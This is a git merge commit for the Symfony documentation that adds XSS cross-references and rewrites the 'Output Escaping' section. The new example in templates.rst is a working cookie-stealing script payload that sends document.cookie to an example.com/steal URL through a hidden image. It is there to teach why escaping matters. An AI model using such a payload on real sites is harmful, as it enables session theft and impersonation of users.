Merge branch '6.4' into 7.0

* 6.4:
  Update more references to XSS attacks
  [Security] Update login_link.rst
  Add a better example of the dangers of XSS attacks

Author: javiereguiluz

html_sanitizer.rst

@@ -11,8 +11,8 @@ that the returned HTML is very predictable (it only contains allowed
 elements), but it does not work well with badly formatted input (e.g.
 invalid HTML). The sanitizer is targeted for two use cases:
 
-* Preventing security attacks based on XSS or other technologies relying on
-  execution of malicious code on the visitors browsers;
+* Preventing security attacks based on :ref:`XSS <xss-attacks>` or other technologies
+  relying on the execution of malicious code on the visitors browsers;
 * Generating HTML that always respects a certain format (only certain
   tags, attributes, hosts, etc.) to be able to consistently style the
   resulting output with CSS. This also protects your application against

reference/configuration/framework.rst

@@ -1786,7 +1786,7 @@ cookie_httponly
 This determines whether cookies should only be accessible through the HTTP
 protocol. This means that the cookie won't be accessible by scripting
 languages, such as JavaScript. This setting can effectively help to reduce
-identity theft through XSS attacks.
+identity theft through :ref:`XSS attacks <xss-attacks>`.
 
 gc_divisor
 ..........

reference/configuration/twig.rst

@@ -38,8 +38,8 @@ autoescape_service
 
 **type**: ``string`` **default**: ``null``
 
-The escaping strategy applied by default to the template is determined during
-compilation time based on the filename of the template. This means for example
+The escaping strategy applied by default to the template (to prevent :ref:`XSS attacks <xss-attacks>`)
+is determined during compilation time based on the filename of the template. This means for example
 that the contents of a ``*.html.twig`` template are escaped for HTML and the
 contents of ``*.js.twig`` are escaped for JavaScript.
 

reference/forms/types/options/sanitize_html.rst.inc

@@ -5,7 +5,7 @@ sanitize_html
 
 When ``true``, the text input will be sanitized using the
 :doc:`Symfony HTML Sanitizer component </html_sanitizer>` after the form is
-submitted. This protects the form input against XSS, clickjacking and CSS
+submitted. This protects the form input against :ref:`XSS <xss-attacks>`, clickjacking and CSS
 injection.
 
 .. note::

reference/forms/types/textarea.rst

@@ -22,7 +22,7 @@ Renders a ``textarea`` HTML element.
 .. caution::
 
     When allowing users to type HTML code in the textarea (or using a
-    WYSIWYG) editor, the application is vulnerable to XSS injection,
+    WYSIWYG) editor, the application is vulnerable to :ref:`XSS injection <xss-attacks>`,
     clickjacking or CSS injection. Use the `sanitize_html`_ option to
     protect against these types of attacks.
 

security/login_link.rst

@@ -279,6 +279,8 @@ This will send an email like this to the user:
         // src/Notifier/CustomLoginLinkNotification
         namespace App\Notifier;
 
+        use Symfony\Component\Notifier\Message\EmailMessage;
+        use Symfony\Component\Notifier\Recipient\EmailRecipientInterface;
         use Symfony\Component\Security\Http\LoginLink\LoginLinkNotification;
 
         class CustomLoginLinkNotification extends LoginLinkNotification

templates.rst

@@ -1278,17 +1278,25 @@ and leaves the repeated contents and HTML structure to some parent templates.
 Read the `Twig template inheritance`_ docs to learn more about how to reuse
 parent block contents when overriding templates and other advanced features.
 
-Output Escaping
----------------
+.. _output-escaping:
+.. _xss-attacks:
+
+Output Escaping and XSS Attacks
+-------------------------------
 
 Imagine that your template includes the ``Hello {{ name }}`` code to display the
-user name. If a malicious user sets ``<script>alert('hello!')</script>`` as
-their name and you output that value unchanged, the application will display a
-JavaScript popup window.
+user name and a malicious user sets the following as their name:
+
+.. code-block:: html
+
+    My Name
+    <script type="text/javascript">
+        document.write('<img src="https://example.com/steal?cookie=' + encodeURIComponent(document.cookie) + '" style="display:none;">');
+    </script>
 
-This is known as a `Cross-Site Scripting`_ (XSS) attack. And while the previous
-example seems harmless, the attacker could write more advanced JavaScript code
-to perform malicious actions.
+You'll see ``My Name`` on screen but the attacker just secretly stole your cookies
+so they can impersonate you on other websites. This is known as a `Cross-Site Scripting`_
+or XSS attack.
 
 To prevent this attack, use *"output escaping"* to transform the characters
 which have special meaning (e.g. replace ``<`` by the ``&lt;`` HTML entity).